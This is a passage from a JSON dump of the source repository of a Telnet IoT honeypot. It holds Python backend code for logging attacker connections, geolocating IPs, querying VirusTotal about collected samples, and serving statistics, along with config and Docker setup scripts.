delta=3600):\n\t\tq = \"\"\"\n\t\tSELECT COUNT(conns.id) as count, :delta * cast((conns.date / :delta) as INTEGER) as hour\n\t\tFROM conns\n\t\tWHERE conns.date >= :from\n\t\tAND conns.date <= :to\n\t\tGROUP BY hour\n\t\t\"\"\"\n\t\treturn self.sess.execute(text(q), {\"from\": fromdate, \"to\": todate, \"delta\": delta})\n\t\n\tdef history_sample(self, id_sample, fromdate, todate, delta=3600):\n\t\tq = \"\"\"\n\t\tSELECT COUNT(conns.id) as count, :delta * cast((conns.date / :delta) as INTEGER) as hour\n\t\tFROM conns\n\t\tINNER JOIN conns_urls on conns_urls.id_conn = conns.id\n\t\tINNER JOIN urls on conns_urls.id_url = urls.id\n\t\tWHERE urls.sample = :id_sample\n\t\tAND conns.date >= :from\n\t\tAND conns.date <= :to\n\t\tGROUP BY hour\n\t\tORDER BY hour ASC\n\t\t\"\"\"\n\t\treturn self.sess.execute(text(q), {\"from\": fromdate, \"to\": todate, \"delta\": delta, \"id_sample\" : id_sample})\n\n\tdef get_samples(self):\n\t\treturn self.sess.execute(samples.select().limit(self.limit_samples))\n\t\n\tdef get_sample(self, sha256):\n\t\treturn self.sess.execute(samples.select().where(samples.c.sha256 == sha256))\n\t\nprint(\"DB Setup done\")\n\n"
  },
  {
    "path": "backend/ipdb/.gitignore",
    "content": "*.CSV\n*.csv\n"
  },
  {
    "path": "backend/ipdb/__init__.py",
    "content": ""
  },
  {
    "path": "backend/ipdb/ipdb.py",
    "content": "\nimport csv\nimport ipaddress\nimport struct\nimport os\n\ndef ipstr2int(ip):\n\tip = unicode(ip)\n\tip = ipaddress.IPv4Address(ip).packed\n\tip = struct.unpack(\"!I\", ip)[0]\n\treturn ip\n\nclass Entry:\n\tdef __init__(self, start, end, value):\n\t\tself.start = int(start)\n\t\tself.end   = int(end)\n\t\tself.value = value\n\nclass IPTable:\n\tdef __init__(self, fname):\n\t\tself.tzlist = []\n\t\tiplocfile = os.path.join(os.path.dirname(__file__), fname)\n\t\twith open(iplocfile, \"rb\") as ipcsv:\n\t\t\treader = csv.reader(ipcsv, delimiter=',', quotechar='\"')\n\t\t\tfor row in reader:\n\t\t\t\te = Entry(row[0], row[1], row)\n\t\t\t\tself.tzlist.append(e)\n\n\tdef find_i(self, ip, start, end):\n\t\tif end - start < 100:\n\t\t\tfor i in range(start, end):\n\t\t\t\tobj = self.tzlist[i]\n\t\t\t\tif obj.start <= ip and ip <= obj.end:\n\t\t\t\t\treturn obj.value\n\t\t\treturn None\n\t\telse:\n\t\t\tmid = start + (end - start) / 2\n\t\t\tval = self.tzlist[mid].start\n\t\t\tif ip < val:   return self.find_i(ip, start, mid)\n\t\t\telif ip > val: return self.find_i(ip, mid, end)\n\t\t\telse:          return self.tzlist[mid].value\n\t\t\n\tdef __iter__(self):\n\t\treturn self.tzlist.__iter__()\n\t\n\tdef find_int(self, ip):\n\t\treturn self.find_i(ip, 0, len(self.tzlist) - 1)\n\n\tdef find(self, ip):\n\t\treturn self.find_i(ipstr2int(ip), 0, len(self.tzlist) - 1)\n\ndef get_geo():\n\treturn IPTable(\"IP2LOCATION-LITE-DB11.CSV\")\n\ndef get_asn():\n\treturn IPTable(\"IP2LOCATION-LITE-ASN.CSV\")\n\ndef get_geo_iter():\n\tiplocfile = os.path.join(os.path.dirname(__file__), \"IP2LOCATION-LITE-DB11.CSV\")\n\tfp = open(iplocfile, \"rb\")\n\treturn csv.reader(fp, delimiter=',', quotechar='\"')\n\nclass IPDB:\n\tdef __init__(self):\n\t\tself.geo = get_geo()\n\t\tself.asn = get_asn()\n\t\t\n\tdef find(self, ip):\n\t\tgeo = self.geo.find(ip)\n\t\tasn = self.asn.find(ip)\n\t\t\n\t\tif geo != None and asn != None:\n\t\t\tr = {}\n\t\t\tr[\"asn\"]      = int(asn[3])\n\t\t\tr[\"ipblock\"]  = asn[2]\n\t\t\tr[\"country\"]  = geo[2]\n\t\t\tr[\"region\"]   = geo[4]\n\t\t\tr[\"city\"]     = geo[5]\n\t\t\tr[\"zip\"]      = geo[8]\n\t\t\tr[\"lon\"]      = float(geo[7])\n\t\t\tr[\"lat\"]      = float(geo[6])\n\t\t\tr[\"timezone\"] = geo[9]\n\t\t\treturn r\n\t\telse:\n\t\t\treturn None\n\nif __name__ == \"__main__\":\n\tdb = IPDB()\n\tprint db.find(\"217.81.94.77\")\n\n\n"
  },
  {
    "path": "backend/virustotal.py",
    "content": "import requests\nimport time\nimport db\nimport Queue\n\nfrom util.config import config\n\n\nclass QuotaExceededError(Exception):\t\t\n\tdef __str__(self):\n\t\treturn \"QuotaExceededError: Virustotal API Quota Exceeded\"\n\nclass Virustotal:\n\tdef __init__(self, key):\n\t\tself.api_key    = key\n\t\tself.url        = \"https://www.virustotal.com/vtapi/v2/\"\n\t\tself.user_agent = \"Telnet Honeybot Backend\"\n\t\tself.engines    = [\"DrWeb\", \"Kaspersky\", \"ESET-NOD32\"]\n\t\t\n\t\tself.queue      = Queue.Queue()\n\t\tself.timeout    = 0\n\n\tdef req(self, method, url, files=None, params=None, headers=None):\n\t\tprint \"VT \" + url\n\t\tr = None\n\t\tif method == \"GET\":\n\t\t\tr = requests.get(url, files=files, params=params, headers=headers)\n\t\telif method == \"POST\":\n\t\t\tr = requests.post(url, files=files, params=params, headers=headers)\n\t\telse:\n\t\t\traise ValueError(\"Unknown Method: \" + str(method))\n\n\t\tif r.status_code == 204:\n\t\t\traise QuotaExceededError()\n\t\telse:\n\t\t\treturn r\n\n\tdef upload_file(self, f, fname):\n\t\tfp      = open(f, 'rb')\n\t\tparams  = {'apikey': self.api_key}\n\t\tfiles   = {'file': (fname, fp)}\n\t\theaders = { \"User-Agent\" : self.user_agent }\n\t\tres     = self.req(\"POST\", self.url + 'file/scan', files=files, params=params, headers=headers)\n\t\tjson    = res.json()\n\t\tfp.close()\n\t\t\n\t\tif json[\"response_code\"] == 1:\n\t\t\treturn json\n\t\telse:\n\t\t\treturn None\n\n\tdef query_hash_sha256(self, h):\n\t\tparams  = { 'apikey': self.api_key, 'resource': h }\n\t\theaders = { \"User-Agent\" : self.user_agent }\n\t\tres     = self.req(\"GET\", self.url + \"file/report\", params=params, headers=headers)\n\n\t\tjson = res.json()\n\n\t\tif json[\"response_code\"] == 1:\n\t\t\treturn json\n\t\telse:\n\t\t\treturn None\n\n\tdef put_comment(self, obj, msg):\n\t\tres = None\n\t\tparams  = { 'apikey': self.api_key, 'resource': obj, \"comment\": msg }\n\t\theaders = { \"User-Agent\" : self.user_agent }\n\t\tres     = self.req(\"GET\", self.url + \"comments/put\", params=params, headers=headers)\n\t\tjson    = res.json()\n\n\t\tif json[\"response_code\"] == 1:\n\t\t\treturn json\n\t\telse:\n\t\t\treturn None\n\t\t\n\tdef get_best_result(self, r):\n\t\tif r[\"scans\"]:\n\t\t\tfor e in self.engines:\n\t\t\t\tif r[\"scans\"][e] and r[\"scans\"][e][\"detected\"]:\n\t\t\t\t\treturn r[\"scans\"][e][\"result\"]\n\t\t\tfor e,x in r[\"scans\"].iteritems():\n\t\t\t\tif x[\"detected\"]:\n\t\t\t\t\treturn x[\"result\"]\n\t\t\treturn None\n\t\telse:\n\t\t\treturn None"
  },
  {
    "path": "backend/virustotal_fill_db.py",
    "content": "import os\n\nfrom util.dbg import dbg\nfrom virustotal import Virustotal\nfrom sampledb import Sampledb\n\nvt  = Virustotal()\nsdb = Sampledb()\n\n# Engines on vt providing good results\nengines = [\"DrWeb\", \"Kaspersky\", \"ESET-NOD32\"]\n\ndef getName(r):\n\tif r[\"scans\"]:\n\t\tfor e in engines:\n\t\t\tif r[\"scans\"][e] and r[\"scans\"][e][\"detected\"]:\n\t\t\t\treturn r[\"scans\"][e][\"result\"]\n\t\tfor e,x in r[\"scans\"].iteritems():\n\t\t\tif x[\"detected\"]:\n\t\t\t\treturn x[\"result\"]\n\t\treturn None\n\telse:\n\t\treturn None\n\n#sdb.sql.execute('ALTER TABLE samples ADD COLUMN result TEXT')\n#sdb.sql.commit()\nfor row in sdb.sql.execute('SELECT id, sha256 FROM samples WHERE result is NULL'):\n\tr   = vt.query_hash_sha256(row[1])\n\tres = str(getName(r))\n\tprint(row[1] + \": \" + res)\n\tsdb.sql.execute('UPDATE samples SET result = ? WHERE id = ?', (res, row[0]))\n\tsdb.sql.commit()\n\n"
  },
  {
    "path": "backend/webcontroller.py",
    "content": "import os\nimport hashlib\nimport traceback\nimport struct\nimport json\nimport time\nimport math\n\nimport additionalinfo\nimport ipdb.ipdb\n\nfrom sqlalchemy import desc, func, and_, or_, not_\nfrom functools import wraps\nfrom simpleeval import simple_eval\nfrom argon2 import argon2_hash\n\nfrom db import get_db, filter_ascii, Sample, Connection, Url, ASN, Tag, User, Network, Malware, IPRange, db_wrapper, conns_conns\nfrom virustotal import Virustotal\n\nfrom cuckoo import Cuckoo\n\nfrom util.dbg import dbg\nfrom util.config import config\n\nfrom difflib import ndiff\n\nclass WebController:\n\n\tdef __init__(self):\n\t\tself.session  = None\n\n\t@db_wrapper\n\tdef get_connection(self, id):\n\t\tconnection = self.session.query(Connection).filter(Connection.id == id).first()\n\n\t\tif connection:\n\t\t\treturn connection.json(depth=1)\n\t\telse:\n\t\t\treturn None\n\n\t@db_wrapper\n\tdef get_connections(self, filter_obj={}, older_than=None):\n\t\tquery = self.session.query(Connection).filter_by(**filter_obj)\n\n\t\tif older_than:\n\t\t\tquery = query.filter(Connection.date < older_than)\n\n\t\tquery = query.order_by(desc(Connection.date))\n\n\t\tconnections = query.limit(32).all()\n\t\treturn map(lambda connection : connection.json(), connections)\n\n\t@db_wrapper\n\tdef get_connections_fast(self):\n\t\tconns = self.session.query(Connection).all()\n\n\t\tclist = []\n\t\tfor conn in conns:\n\t\t\tclist.append({\n\t\t\t\t\"id\": conn.id,\n\t\t\t\t\"ip\": conn.ip,\n\t\t\t\t\"conns_before\": map(lambda c: c.id, conn.conns_before),\n\t\t\t\t\"conns_after\": map(lambda c: c.id, conn.conns_after)\n\t\t\t})\n\n\t\treturn clist\n\t\t\n\t##\n\t\n\t@db_wrapper\n\tdef get_networks(self):\n\t\tnetworks = self.session.query(Network).all()\n\t\tret      = []\n\t\tfor network in networks:\n\t\t\tif len(network.samples) > 0 and network.nb_firstconns >= 10:\n\t\t\t\tn   = network.json(depth = 0)\n\t\t\t\t# ips = set()\n\t\t\t\t# for connection in network.connections:\n\t\t\t\t# \tips.add(connection.ip)\n\t\t\t\t# n[\"ips\"] = list(ips)\n\t\t\t\tret.append(n)\n\t\treturn ret\n\t\n\t@db_wrapper\n\tdef get_network(self, net_id):\n\t\tnetwork  = self.session.query(Network).filter(Network.id == net_id).first()\n\t\tret      = network.json()\n\t\t\n\t\thoneypots              = {}\n\t\tinitialconnections     = filter(lambda connection: len(connection.conns_before) == 0, network.connections)\n\t\tret[\"connectiontimes\"] = map(lambda connection: connection.date, initialconnections)\n\t\t\n\t\thas_infected = set([])\n\t\tfor connection in network.connections:\n\t\t\tif connection.backend_user.username in honeypots:\n\t\t\t\thoneypots[connection.backend_user.username] += 1\n\t\t\telse:\n\t\t\t\thoneypots[connection.backend_user.username] = 1\n\n\t\t\tfor connection_before in connection.conns_before:\n\t\t\t\tif connection.ip != connection_before.ip:\n\t\t\t\t\thas_infected.add((\"i:\" + connection.ip, \"i:\" + connection_before.ip))\n\n\t\t\tfor url in connection.urls:\n\t\t\t\thas_infected.add((\"u:\" + url.url, \"i:\" + connection.ip))\t\t\n\t\t\t\t\n\t\t\t\tif url.sample:\n\t\t\t\t\thas_infected.add((\"s:\" + url.sample.sha256, \"u:\" + url.url))\n\n\t\tret[\"has_infected\"] = list(has_infected)\n\t\tret[\"honeypots\"]    = honeypots\n\t\t\n\t\treturn ret\n\t\n\t@db_wrapper\n\tdef get_network_history(self, not_before, not_after, network_id):\n\t\tgranularity = float(3600 * 24) # 1 day\n\t\ttimespan    = float(not_after - not_before)\n\t\t\n\t\tif timespan < 3600 * 24 * 2:\n\t\t\tgranularity = float(3600) * 2\n\t\t\n\t\tconns = self.session.query(Connection.date)\n\t\tconns = conns.filter(Connection.network_id == network_id)\n\t\tconns = conns.filter(and_(not_before < Connection.date, Connection.date < not_after))\n\t\t\n\t\t# Filter out subsequent connections\n\t\tconns = conns.outerjoin(conns_conns, Connection.id == conns_conns.c.id_last)\n\t\tconns = conns.filter(conns_conns.c.id_last == None)\n\t\t\n\t\tret = [0] * int(math.ceil(timespan / granularity))\n\t\t\n\t\tfor i in range(len(ret)):\n\t\t\tret[i] = [ not_before + i * granularity, 0 ]\n\t\t\n\t\tfor date in conns.all():\n\t\t\ti = int((date[0] - not_before) / granularity)\n\t\t\tret[i][1] += 1\n\t\t\t\n\t\treturn ret\n\t\n\t@db_wrapper\n\tdef get_biggest_networks_history(self, not_before, not_after):\n\t\t\n\t\tMAX_NETWORKS = 4\n\t\t\n\t\tn = self.session.query(Connection.network_id, func.count(Connection.network_id))\n\t\tn = n.filter(and_(not_before < Connection.date, Connection.date < not_after))\n\t\t\n\t\t# Filter out subsequent connections\n\t\tn = n.outerjoin(conns_conns, Connection.id == conns_conns.c.id_last)\n\t\tn = n.filter(conns_conns.c.id_last == None)\n\t\t\n\t\tn = n.group_by(Connection.network_id)\n\t\tn = n.order_by(func.count(Connection.network_id).desc())\n\t\t\n\t\tdata = n.all()\n\t\t\n\t\tnb_networks = min(MAX_NETWORKS, len(data))\n\t\t\n\t\tr = [0] * nb_networks\n\t\t\n\t\ti = 0\n\t\tfor net in data[:nb_networks]:\n\t\t\t\n\t\t\tnetwork = self.session.query(Network).filter(Network.id == net[0]).first()\n\t\t\t\n\t\t\tif (network != None):\n\t\t\t\tr[i] = { \"network\": network.json(), \"data\": self.get_network_history(not_before, not_after, network.id) }\n\t\t\t\ti   += 1\n\t\t\n\t\treturn r\n\t\n\t@db_wrapper\n\tdef get_connection_locations(self, not_before, not_after, network_id = None):\n\t\tconns = self.session.query(Connection.lat, Connection.lon)\n\t\t\n\t\tconns = conns.filter(and_(not_before < Connection.date, Connection.date < not_after))\n\t\t\n\t\tif network_id:\n\t\t\tconns = conns.filter(Connection.network_id == network_id)\n\t\t\t\n\t\tconns = conns.all()\n\t\t\n\t\treturn conns\n\n\t##\n\t\n\t@db_wrapper\n\tdef get_malwares(self):\n\t\tmalwares = self.session.query(Malware).all()\n\t\treturn map(lambda m: m.json(), malwares)\n\n\t##\n\n\t@db_wrapper\n\tdef get_sample(self, sha256):\n\t\tsample = self.session.query(Sample).filter(Sample.sha256 == sha256).first()\n\t\treturn sample.json(depth=1) if sample else None\n\n\t@db_wrapper\n\tdef get_newest_samples(self):\n\t\tsamples = self.session.query(Sample).order_by(desc(Sample.date)).limit(16).all()\n\t\treturn map(lambda sample : sample.json(), samples)\n\n\t##\n\n\t@db_wrapper\n\tdef get_url(self, url):\n\t\turl_obj = self.session.query(Url).filter(Url.url == url).first()\n\t\treturn url_obj.json(depth=1) if url_obj else None\n\n\t@db_wrapper\n\tdef get_newest_urls(self):\n\t\turls = self.session.query(Url).order_by(desc(Url.date)).limit(16).all()\n\t\treturn map(lambda url : url.json(), urls)\n\n\t##\n\n\t@db_wrapper\n\tdef get_tag(self, name):\n\t\ttag = self.session.query(Tag).filter(Tag.name == name).first()\n\t\treturn tag.json(depth=1) if tag else None\n\n\t@db_wrapper\n\tdef get_tags(self):\n\t\ttags = self.session.query(Tag).all()\n\t\treturn map(lambda tag : tag.json(), tags)\n\n\t##\n\n\t@db_wrapper\n\tdef get_country_stats(self):\n\t\tstats = self.session.query(func.count(Connection.country), Connection.country).group_by(Connection.country).all()\n\t\treturn stats\n\n\t##\n\n\t@db_wrapper\n\tdef get_asn(self, asn):\n\t\tasn_obj = self.session.query(ASN).filter(ASN.asn == asn).first()\n\n\t\tif asn_obj:\n\t\t\treturn asn_obj.json(depth=1)\n\t\telse:\n\t\t\treturn None\n\n\t##\n\t\n\t@db_wrapper\n\tdef connhash_tree_lines(self, lines, mincount):\n\t\tlength     = 1 + lines * 4\n\t\tothercount = 0\n\t\t\n\t\tret   = {}\n\t\tdbres = self.session.query(func.count(Connection.id),\n\t\t\tfunc.substr(Connection.connhash, 0, length).label(\"c\"),\n\t\t\tConnection.stream, Connection.id).group_by(\"c\").all()\n\n\t\tfor c in dbres:\n\t\t\tcount    = c[0]\n\t\t\tconnhash = c[1]\n\t\t\tif count > mincount:\n\t\t\t\tev_in = filter(lambda ev : ev[\"in\"], json.loads(c[2]))\n\n\t\t\t\tif len(ev_in) >= lines:\n\t\t\t\t\tret[connhash] = {\n\t\t\t\t\t\t\"count\": c[0],\n\t\t\t\t\t\t\"connhash\": connhash,\n\t\t\t\t\t\t\"text\": ev_in[lines-1][\"data\"],\n\t\t\t\t\t\t\"childs\": [],\n\t\t\t\t\t\t\"sample_id\": c[3]\n\t\t\t\t\t}\n\t\t\telse:\n\t\t\t\tothercount += count\n\n\t\treturn ret\n\n\t@db_wrapper\n\tdef connhash_tree(self, layers):\n\t\ttree  = self.connhash_tree_lines(1, 10)\n\t\tlayer = tree\n\n\t\tfor lines in range(2,layers+1):\n\t\t\tlength = (lines-1) * 4\n\t\t\tnew_layer = self.connhash_tree_lines(lines, 0)\n\t\t\tfor connhash in new_layer:\n\t\t\t\tconnhash_old = connhash[:length]\n\t\t\t\tif connhash_old in layer:\n\t\t\t\t\tparent = layer[connhash_old]\n\t\t\t\t\tparent[\"childs\"].append(new_layer[connhash])\n\t\t\tlayer = new_layer\n\n\t\treturn tree\n\t\t\t\t\n\t\t\t\n"
  },
  {
    "path": "backend.py",
    "content": "import sys\nimport json\nimport traceback\n\nfrom util.config import config\n\nif len(sys.argv) > 1 and sys.argv[1] == \"cleardb\":\n\tprint \"This will DELETE ALL DATA except users and cached asn data\"\n\tprint \"from the database currently used at:\"\n\tprint \"\"\n\tprint \"    \" + config.get(\"sql\")\n\tprint \"\"\n\tprint \"If you really want to DELETE ALL DATA, type 'delete' and press enter.\"\n\tprint \"\"\n\tdoit = sys.stdin.readline()\n\tprint \"\"\n\tif doit.strip() != \"delete\":\n\t\tprint \"ABORTED\"\n\t\tsys.exit(0)\n\n\tfrom backend.db import delete_everything\n\tdelete_everything()\n\tsys.exit(0)\n\n# Import from backend is faster:\n# Benchmark:\n# \tCPU:        Intel(R) Core(TM) i5-6500 CPU @ 3.20GHz\n# \tStorage:    Samsung SSD PM961\n#\tFile size:  7,3M\n#\tSQLite:\n#\t\thoneypot: 0m26,056s\n#\t\tbackend:  0m21,445s\n#\tMariadb:\n#\t\thoneypot: 0m32,684s\n#\t\tbackend:  0m14,849s\n\nif len(sys.argv) > 2 and sys.argv[1] == \"import\":\n\tfrom backend.clientcontroller import ClientController\n\n\tfname = sys.argv[2]\n\tif len(sys.argv) > 3:\n\t\tusername = sys.argv[3]\n\telse:\n\t\tusername = config.get(\"backend_user\")\n\n\tprint \"Importing \" + fname + \" as user \" + username\n\n\twith open(fname, \"rb\") as fp:\n\t\tctrl = ClientController()\n\t\tfor line in fp:\n\t\t\tline = line.strip()\n\t\t\tobj  = json.loads(line)\n\n\t\t\tif obj[\"ip\"] != None and obj[\"date\"] >= 1515899912:\n\t\t\t\tprint \"conn   \" + obj[\"ip\"] + \" date \" + str(obj[\"date\"])\n\t\t\t\tobj[\"backend_username\"] = username\n\t\t\t\ttry:\n\t\t\t\t\tctrl.put_session(obj)\n\t\t\t\texcept:\n\t\t\t\t\tprint \"Cannot Put Session\"\n\t\t\t\t\tprint \"----------------------------\"\n\t\t\t\t\ttraceback.print_exc()\n\t\t\t\t\tprint \"----------------------------\"\n\t\t\t\t\tprint repr(obj)\n\t\t\t\t\tsys.exit(0)\n\tsys.exit(0)\n\nif len(sys.argv) > 1:\n\tprint \"Unknown action '\" + sys.argv[1] + \"'\"\n\tprint \"Available commands:\"\n\tprint \"    import file.json : imports raw og file\"\n\tprint \"    cleardb          : deletes all data from db\"\n\tprint \"To simply start the backend, use no command at all\"\n\tsys.exit(0)\n\nfrom backend.backend import run\nrun()\n\n"
  },
  {
    "path": "config.dist.yaml",
    "content": "# This is the default (distribution) config file\n# For local configuration, please create and edit the file \"config.yaml\",\n# this ensures your configuration to endure a update using git pull\n\n# this file is in YAML format\n# If you don't know YAML, check https://de.wikipedia.org/wiki/YAML\n# or just copy around existing entries\n\n#############################################\n# Global config\n# used by both honeypot AND backend\n\n# Credentials for authetification\n# Used by honeypot only\n# If not set, will be randomly generated\n# If the backend cannot find a user with id == 1 in its database,\n#   it will generate one using this credentials (or the ones autogenerated)\n# backend_user: \"CHANGEME\"\n# backend_pass: \"CHANGEME\"\n\n##############################################\n# Honeypot configuration\n\n# Backend URL to which honeypot will connect to to store data\nbackend: \"http://localhost:5000\"\n\n# Write raw data to logfile, can be imported into backend db later\n#   does include everything EXCEPT sample contents\nlog_raw: null\n\n# Save samples in sample_dir\nlog_samples: False\n\n# Do not download any samples, use their url as content\n#   useful for debugging\nfake_dl: false\n\n# Telnet port\ntelnet_addr: \"\"\ntelnet_port: 2323\n\n# Timeout in seconds for telnet session. Will expire if no bytes can be read from socket.\ntelnet_session_timeout: 60\n\n# Maximum session length in seconds.\ntelnet_max_session_length: 120\n\n# Minimum time between 2 connection from the same ip, if closer together\n# they will be refused\ntelnet_ip_min_time_between_connections: 30\n\n#############################################\n# Backend configuration\n\n# sqlalchemy sql connect string\n# examples:\n# using sqlite: \"sqlite:///database.db\"\n# using mysql:  \"\"mysql+mysqldb://USER:PASSWORD@MYSQL_HOST/DATABASE_NAME\",\"\nsql: \"sqlite:///database.db\"\n\n# IP Address and port for http interface\nhttp_port: 5000\nhttp_addr: \"127.0.0.1\"\n\n# Max connections to sql db, maybe restricted in some scenarios\nmax_db_conn: 1\n\n# Directory in which samples are stored\nsample_dir: \"samples\"\n\n# Virustotal API key\nvt_key:       \"GET_YOUR_OWN\"\nsubmit_to_vt: false\n\n# Enable or Disable IP to ASN resolution\n# Options: \"none\" | \"offline\" | \"online\"\n#    offline works by importing data from https://lite.ip2location.com/ - dowload must be done manually\n#    online  works by querying origin.asn.cymru.com\nip_to_asn_resolution: \"online\"\n\ncuckoo_enabled:  false,\ncuckoo_url_base: \"http://127.0.0.1:8090\"\ncuckoo_user:     \"user\"\ncuckoo_passwd:   \"passwd\"\ncuckoo_force:    0\n\n"
  },
  {
    "path": "create_config.sh",
    "content": "#!/bin/bash\n\nif [ -f config.yaml ]; then\n\techo \"config.yaml already exists, aborting\"\n\texit\nfi\n\nuser=admin\npass=$(openssl rand -hex 16)\nsalt=$(openssl rand -hex 16)\n\necho \"backend_user: $user\" >> config.yaml\necho \"backend_pass: $pass\" >> config.yaml\necho \"backend_salt: $salt\" >> config.yaml\n\n"
  },
  {
    "path": "create_docker.sh",
    "content": "#!/bin/bash\n\nif [ -f config.yaml ]; then\n\techo -n \"config.yaml already exists, delete it? (Y/n): \"\n\tread force\n\tif [ \"$force\" = \"Y\" ] || [ \"$force\" = \"y\" ] || [ \"$force\" = \"\" ]; then\n\t\trm config.yaml\n\telse\n\t\techo aborting...\n\t\texit 1\n\tfi\nfi\n\nif [ -f docker-compose.yml ]; then\n\techo -n \"docker-compose.yml already exists, delete it? (Y/n): \"\n\tread force\n\tif [ \"$force\" = \"Y\" ] || [ \"$force\" = \"y\" ] || [ \"$force\" = \"\" ]; then\n\t\trm docker-compose.yml\n\telse\n\t\techo aborting...\n\t\texit 1\n\tfi\nfi\n\necho -n \"DB: Use maria or sqlite? (maria/sqlite): \"\nread dbbackend\nif [ \"$dbbackend\" != \"maria\" ] && [ \"$dbbackend\" != \"sqlite\" ]; then\n\techo \"$dbbackend is not valid\"\n\texit 1\nfi\n\n# Honeypot setup\necho \" - Writing honeypot config\"\nuser=admin\npass=$(openssl rand -hex 16)\nsalt=$(openssl rand -hex 16)\necho \"backend_user: $user\" >> config.yaml\necho \"backend_pass: $pass\" >> config.yaml\necho \"backend_salt: $salt\" >> config.yaml\necho \"http_addr: \\\"0.0.0.0\\\"\" >> config.yaml\necho \"telnet_addr: \\\"0.0.0.0\\\"\" >> config.yaml\necho \"backend: \\\"http://backend:5000\\\"\" >> config.yaml\necho \"log_samples: True\" >> config.yaml\necho \"sample_dir: samples\" >> config.yaml\n\n# DB setup\nif [ \"$dbbackend\" = \"maria\" ]; then\n\tdbpass=$(openssl rand -hex 16)\n\tsql=\"mysql+mysqldb://honey:$dbpass@honeydb/honey\"\n\techo sql: \\\"$sql\\\" >> config.yaml\nfi\n\n# docker-compose setup\necho \" - Writing docker-compose.yml\"\ncat << EOF >> docker-compose.yml\nversion: \"3.7\"\nservices:\n  honeypot:\n    depends_on:\n      - backend\n    image: telnet-iot-honeypot:hot\n    restart: always\n    entrypoint:\n      - python\n      - honeypot.py\n    ports:\n      - \"2323:2323\"\n    volumes:\n      - \"./samples:/usr/src/app/samples\"\n  backend:\n    build: .\n    image: telnet-iot-honeypot:hot\n    restart: always\n    entrypoint:\n      - python\n      - backend.py\n    ports:\n      - \"5000:5000\"\n    volumes:\n      - \"./samples:/usr/src/app/samples\"\nEOF\n\nif [ \"$dbbackend\" = \"maria\" ]; then\n\tcat << EOF >> docker-compose.yml\n    depends_on:\n      - honeydb\n  honeydb:\n    image: mariadb:latest\n    restart: always\n    environment:\n      MYSQL_RANDOM_ROOT_PASSWORD: \"yes\"\n      MYSQL_DATABASE: honey\n      MYSQL_USER: honey\n      MYSQL_PASSWORD: $dbpass\nEOF\nfi\n\necho -n \"Start honeypot using docker-compose now? d = start using daemon flag (Y/n/d): \"\nread runit\nif [ \"$runit\" = \"d\" ]; then\n\tsudo docker-compose up -d\nelif [ \"$runit\" = \"Y\" ] || [ \"$runit\" = \"y\" ] || [ \"$runit\" = \"\" ]; then\n\tsudo docker-compose up\nfi\n\n"
  },
  {
    "path": "honeypot/__init__.py",
    "content": ""
  },
  {
    "path": "honeypot/__main__.py",
    "content": "import signal\n\nfrom telnet import Telnetd\nfrom util.dbg import dbg\n\ndef signal_handler(signal, frame):\n\tdbg('Ctrl+C')\n\tsrv.stop()\n\nsignal.signal(signal.SIGINT, signal_handler)\n\nsrv = Telnetd(2222)\nsrv.run()"
  },
  {
    "path": "honeypot/client.py",
    "content": "import requests\nimport requests.exceptions\nimport requests.auth\n\nimport json\n\nfrom util.dbg import dbg\nfrom util.config import config\n\nclass Client:\n\n\tdef __init__(self):\n\t\tself.user     = config.get(\"backend_user\")\n\t\tself.password = config.get(\"backend_pass\")\n\t\tself.url      = config.get(\"backend\")\n\t\tself.auth     = requests.auth.HTTPBasicAuth(self.user, self.password)\n\n\t\tself.test_login()\n\t\n\tdef test_login(self):\n\t\ttry:\n\t\t\tr = requests.get(self.url + \"/connections\", auth=self.auth, timeout=20.0)\n\t\texcept:\n\t\t\traise IOError(\"Cannot connect to backend\")\n\t\ttry:\n\t\t\tr = requests.get(self.url + \"/login\", auth=self.auth, timeout=20.0)\n\t\t\tif r.status_code != 200:\n\t\t\t\traise IOError()\n\t\texcept:\n\t\t\traise IOError(\"Backend authentification test failed, check config.json\")\n\n\tdef put_session(self, session, retry=True):\n\t\t\n\t\ttry:\n\t\t\tr = requests.put(self.url + \"/conns\", auth=self.auth, json=session, timeout=20.0)\n\t\texcept requests.exceptions.RequestException:\n\t\t\tdbg(\"Cannot connect to backend\")\n\t\t\treturn []\n\t\t\n\t\tif r.status_code == 200:\n\t\t\treturn r.json()\n\t\telif retry:\n\t\t\tmsg = r.raw.read()\n\t\t\tdbg(\"Backend upload failed, retrying (\" + str(msg) + \")\")\n\t\t\treturn self.put_session(session, False)\n\t\telse:\n\t\t\tmsg = r.raw.read()\n\t\t\traise IOError(msg)\n\n\tdef put_sample(self, data, retry=True):\n\t\t\n\t\ttry:\n\t\t\tr = requests.post(self.url + \"/file\", auth=self.auth, data=data, timeout=20.0)\n\t\texcept requests.exceptions.RequestException:\n\t\t\tdbg(\"Cannot connect to backend\")\n\t\t\treturn\n\t\t\n\t\tif r.status_code == 200:\n\t\t\treturn\n\t\telif retry:\n\t\t\tmsg = r.raw.read()\n\t\t\tdbg(\"Backend upload failed, retrying (\" + str(msg) + \")\")\n\t\t\treturn self.put_sample(sha256, filename, False)\n\t\telse:\n\t\t\tmsg = r.raw.read()\n\t\t\traise IOError(msg)\n\n"
  },
  {
    "path": "honeypot/sampledb_client.py",
    "content": "import client\nimport time\nimport traceback\nimport os\nimport requests\nimport hashlib\nimport json\n\nfrom util.dbg import dbg\nfrom util.config import config\n\nBACKEND = None\n\ndef get_backend():\n\tglobal BACKEND\n\n\tif BACKEND != None:\n\t\treturn BACKEND\n\telif config.get(\"backend\", optional=True) != None:\n\t\tBACKEND = client.Client()\n\t\treturn BACKEND\n\telse:\n\t\treturn None\n\ndef sha256(data):\n    h = hashlib.sha256()\n    h.update(data)\n    return h.hexdigest()\n    \nclass SampleRecord:\n\n\tdef __init__(self, url, name, info, data):\n\t\tself.url    = url\n\t\tself.name   = name\n\t\tself.date   = int(time.time())\n\t\tself.info   = info\n\t\tself.data   = data\n\t\tif data:\n\t\t\tself.sha256 = sha256(data)\n\t\t\tself.length = len(data)\n\t\telse:\n\t\t\tself.sha256 = None\n\t\t\tself.length = None\n\t\n\tdef json(self):\n\t\treturn {\n\t\t\t\"type\":   \"sample\",\n\t\t\t\"url\":    self.url,\n\t\t\t\"name\":   self.name,\n\t\t\t\"date\":   self.date,\n\t\t\t\"sha256\": self.sha256,\n\t\t\t\"info\":   self.info,\n\t\t\t\"length\": self.length\n\t\t}\n\nclass SessionRecord:\n\n\tdef __init__(self):\n\t\tself.back        = get_backend()\n\t\tself.logfile     = config.get(\"log_raw\",     optional=True)\n\t\tself.log_samples = config.get(\"log_samples\", optional=True, default=False)\n\t\tself.sample_dir  = config.get(\"sample_dir\",  